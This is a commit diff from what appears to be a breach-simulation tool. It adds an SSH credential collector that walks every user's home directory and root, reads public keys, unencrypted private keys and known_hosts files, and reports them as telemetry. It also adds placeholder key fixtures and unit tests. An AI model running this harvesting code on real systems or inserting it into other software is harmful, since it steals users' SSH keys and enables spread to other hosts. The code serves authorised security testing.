Agent, UT: Refactor SSH info collector to credential collector
This commit is contained in:
parent
976c46cf86
commit
5aa5e33356
|
@ -0,0 +1,141 @@
|
|||
import glob
|
||||
import logging
|
||||
import os
|
||||
import pwd
|
||||
from typing import Dict, Iterable
|
||||
|
||||
from common.utils.attack_utils import ScanStatus
|
||||
from infection_monkey.credential_collectors import (
|
||||
Credentials,
|
||||
ICredentialCollector,
|
||||
SSHKeypair,
|
||||
Username,
|
||||
)
|
||||
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SSHCollector(ICredentialCollector):
|
||||
"""
|
||||
SSH keys and known hosts collection module
|
||||
"""
|
||||
|
||||
default_dirs = ["/.ssh/", "/"]
|
||||
|
||||
def collect_credentials(self) -> Credentials:
|
||||
logger.info("Started scanning for SSH credentials")
|
||||
home_dirs = SSHCollector._get_home_dirs()
|
||||
ssh_info = SSHCollector._get_ssh_files(home_dirs)
|
||||
logger.info("Scanned for SSH credentials")
|
||||
|
||||
return SSHCollector._to_credentials(ssh_info)
|
||||
|
||||
@staticmethod
|
||||
def _to_credentials(ssh_info: Iterable[Dict]) -> Credentials:
|
||||
credentials_obj = Credentials(identities=[], secrets=[])
|
||||
|
||||
for info in ssh_info:
|
||||
credentials_obj.identities.append(Username(info["name"]))
|
||||
ssh_keypair = {}
|
||||
if "public_key" in info:
|
||||
ssh_keypair["public_key"] = info["public_key"]
|
||||
if "private_key" in info:
|
||||
ssh_keypair["private_key"] = info["private_key"]
|
||||
if "public_key" in info:
|
||||
ssh_keypair["known_hosts"] = info["known_hosts"]
|
||||
|
||||
credentials_obj.secrets.append(SSHKeypair(ssh_keypair))
|
||||
|
||||
return credentials_obj
|
||||
|
||||
@staticmethod
|
||||
def _get_home_dirs() -> Iterable[Dict]:
|
||||
root_dir = SSHCollector._get_ssh_struct("root", "")
|
||||
home_dirs = [
|
||||
SSHCollector._get_ssh_struct(x.pw_name, x.pw_dir)
|
||||
for x in pwd.getpwall()
|
||||
if x.pw_dir.startswith("/home")
|
||||
]
|
||||
home_dirs.append(root_dir)
|
||||
return home_dirs
|
||||
|
||||
@staticmethod
|
||||
def _get_ssh_struct(name: str, home_dir: str) -> Dict:
|
||||
"""
|
||||
Construct the SSH info. It consisted of: name, home_dir,
|
||||
public_key, private_key and known_hosts.
|
||||
|
||||
public_key: contents of *.pub file (public key)
|
||||
private_key: contents of * file (private key)
|
||||
known_hosts: contents of known_hosts file(all the servers keys are good for,
|
||||
possibly hashed)
|
||||
|
||||
:param name: username of user, for whom the keys belong
|
||||
:param home_dir: users home directory
|
||||
:return: SSH info struct
|
||||
"""
|
||||
return {
|
||||
"name": name,
|
||||
"home_dir": home_dir,
|
||||
"public_key": None,
|
||||
"private_key": None,
|
||||
"known_hosts": None,
|
||||
}
|
||||
|
||||
@staticmethod
|
||||
def _get_ssh_files(usr_info: Iterable[Dict]) -> Iterable[Dict]:
|
||||
for info in usr_info:
|
||||
path = info["home_dir"]
|
||||
for directory in SSHCollector.default_dirs:
|
||||
if os.path.isdir(path + directory):
|
||||
try:
|
||||
current_path = path + directory
|
||||
# Searching for public key
|
||||
if glob.glob(os.path.join(current_path, "*.pub")):
|
||||
# Getting first file in current path with .pub extension(public key)
|
||||
public = glob.glob(os.path.join(current_path, "*.pub"))[0]
|
||||
logger.info("Found public key in %s" % public)
|
||||
try:
|
||||
with open(public) as f:
|
||||
info["public_key"] = f.read()
|
||||
# By default private key has the same name as public,
|
||||
# only without .pub
|
||||
private = os.path.splitext(public)[0]
|
||||
if os.path.exists(private):
|
||||
try:
|
||||
with open(private) as f:
|
||||
# no use from ssh key if it's encrypted
|
||||
private_key = f.read()
|
||||
if private_key.find("ENCRYPTED") == -1:
|
||||
info["private_key"] = private_key
|
||||
logger.info("Found private key in %s" % private)
|
||||
T1005Telem(
|
||||
ScanStatus.USED, "SSH key", "Path: %s" % private
|
||||
).send()
|
||||
else:
|
||||
continue
|
||||
except (IOError, OSError):
|
||||
pass
|
||||
# By default, known hosts file is called 'known_hosts'
|
||||
known_hosts = os.path.join(current_path, "known_hosts")
|
||||
if os.path.exists(known_hosts):
|
||||
try:
|
||||
with open(known_hosts) as f:
|
||||
info["known_hosts"] = f.read()
|
||||
logger.info("Found known_hosts in %s" % known_hosts)
|
||||
except (IOError, OSError):
|
||||
pass
|
||||
# If private key found don't search more
|
||||
if info["private_key"]:
|
||||
break
|
||||
except (IOError, OSError):
|
||||
pass
|
||||
except OSError:
|
||||
pass
|
||||
usr_info = [
|
||||
info
|
||||
for info in usr_info
|
||||
if info["private_key"] or info["known_hosts"] or info["public_key"]
|
||||
]
|
||||
return usr_info
|
|
@ -0,0 +1 @@
|
|||
from .SSH_credentials_collector import SSHCollector
|
|
@ -0,0 +1,3 @@
|
|||
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||
LoremIpsumSomethingNothing
|
||||
-----END OPENSSH PRIVATE KEY-----
|
|
@ -0,0 +1 @@
|
|||
ssh-ed25519 something-public-here valid.email@at-email.com
|
|
@ -0,0 +1,4 @@
|
|||
|1|really+known+host|known_host1
|
||||
|1|really+known+host|known_host2
|
||||
|1|really+known+host|known_host3
|
||||
|1|really+known+host|known_host4
|
|
@ -0,0 +1 @@
|
|||
ssh-ed25519 something-public-here valid.email@at-email.com
|
|
@ -0,0 +1,94 @@
|
|||
import os
|
||||
import pwd
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from infection_monkey.credential_collectors import SSHKeypair, Username
|
||||
from infection_monkey.credential_collectors.ssh_collector import SSHCollector
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def project_name(pytestconfig):
|
||||
home_dir = str(Path.home())
|
||||
return "/" / Path(str(pytestconfig.rootdir).replace(home_dir, ""))
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def ssh_test_dir(project_name):
|
||||
return project_name / "monkey" / "tests" / "data_for_tests" / "ssh_info"
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def get_username():
|
||||
return pwd.getpwuid(os.getuid()).pw_name
|
||||
|
||||
|
||||
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
|
||||
def test_ssh_credentials_collector_success(ssh_test_dir, get_username, monkeypatch):
|
||||
monkeypatch.setattr(
|
||||
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
|
||||
[str(ssh_test_dir / "ssh_info_full")],
|
||||
)
|
||||
|
||||
ssh_credentials = SSHCollector().collect_credentials()
|
||||
|
||||
assert len(ssh_credentials.identities) == 1
|
||||
assert type(ssh_credentials.identities[0]) == Username
|
||||
assert "username" in ssh_credentials.identities[0].content
|
||||
assert ssh_credentials.identities[0].content["username"] == get_username
|
||||
|
||||
assert len(ssh_credentials.secrets) == 1
|
||||
assert type(ssh_credentials.secrets[0]) == SSHKeypair
|
||||
|
||||
assert len(ssh_credentials.secrets[0].content) == 3
|
||||
assert (
|
||||
ssh_credentials.secrets[0]
|
||||
.content["private_key"]
|
||||
.startswith("-----BEGIN OPENSSH PRIVATE KEY-----")
|
||||
)
|
||||
assert (
|
||||
ssh_credentials.secrets[0]
|
||||
.content["public_key"]
|
||||
.startswith("ssh-ed25519 something-public-here")
|
||||
)
|
||||
assert ssh_credentials.secrets[0].content["known_hosts"].startswith("|1|really+known+host")
|
||||
|
||||
|
||||
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
|
||||
def test_no_ssh_credentials(monkeypatch):
|
||||
monkeypatch.setattr(
|
||||
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs", []
|
||||
)
|
||||
|
||||
ssh_credentials = SSHCollector().collect_credentials()
|
||||
|
||||
assert len(ssh_credentials.identities) == 0
|
||||
assert len(ssh_credentials.secrets) == 0
|
||||
|
||||
|
||||
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
|
||||
def test_ssh_collector_partial_credentials(monkeypatch, ssh_test_dir):
|
||||
monkeypatch.setattr(
|
||||
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
|
||||
[str(ssh_test_dir / "ssh_info_partial")],
|
||||
)
|
||||
|
||||
ssh_credentials = SSHCollector().collect_credentials()
|
||||
|
||||
assert len(ssh_credentials.secrets[0].content) == 3
|
||||
assert ssh_credentials.secrets[0].content["private_key"] is None
|
||||
assert ssh_credentials.secrets[0].content["known_hosts"] is None
|
||||
|
||||
|
||||
@pytest.mark.skipif(os.name != "posix", reason="We run SSH only on Linux.")
|
||||
def test_ssh_collector_no_public_key(monkeypatch, ssh_test_dir):
|
||||
monkeypatch.setattr(
|
||||
"infection_monkey.credential_collectors.ssh_collector.SSHCollector.default_dirs",
|
||||
[str(ssh_test_dir / "ssh_info_no_public_key")],
|
||||
)
|
||||
|
||||
ssh_credentials = SSHCollector().collect_credentials()
|
||||
|
||||
assert len(ssh_credentials.identities) == 0
|
||||
assert len(ssh_credentials.secrets) == 0
|
Loading…
Reference in New Issue